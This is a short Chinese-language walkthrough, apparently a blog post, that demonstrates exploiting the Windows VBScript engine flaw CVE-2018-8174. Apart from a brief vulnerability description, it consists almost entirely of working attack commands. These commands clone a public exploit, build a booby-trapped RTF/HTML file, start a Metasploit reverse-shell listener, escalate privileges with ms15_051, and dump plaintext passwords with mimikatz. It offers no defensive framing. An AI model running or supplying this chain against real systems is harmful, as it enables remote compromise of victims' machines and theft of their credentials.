0x00. 序言
漏洞描述CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的32位 IE浏览器及使用了IE内核的应用程序。
0x01. 操作演示
1. 下载EXP到kali ,生成木马文件,启动msf监听
1 2 3 4 5
| git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git cd CVE-2018-8174_EXP/ python CVE-2018-8174.py -u http://192.168.1.111/exploit.html -o exploit.rtf -i 192.168.1.111 -p 4444 cp exploit.html /var/www/html/ service apache2 start
|
1 2 3 4 5 6
| msfconsole use exploit/multi/handler set payload windows/shell/reverse_tcp set lhost 192.168.1.111 set lport 4444 run
|

3. 先将 shell 转换为 meterpreter ,再利用ms15_051提权
1 2 3 4
| sessions -u 2 use windows/local/ms15_051_client_copy_image set session 3 run
|

4. 利用mimikatz 盗取明文密码
1 2 3
| load mimikatz msv kerberos
|
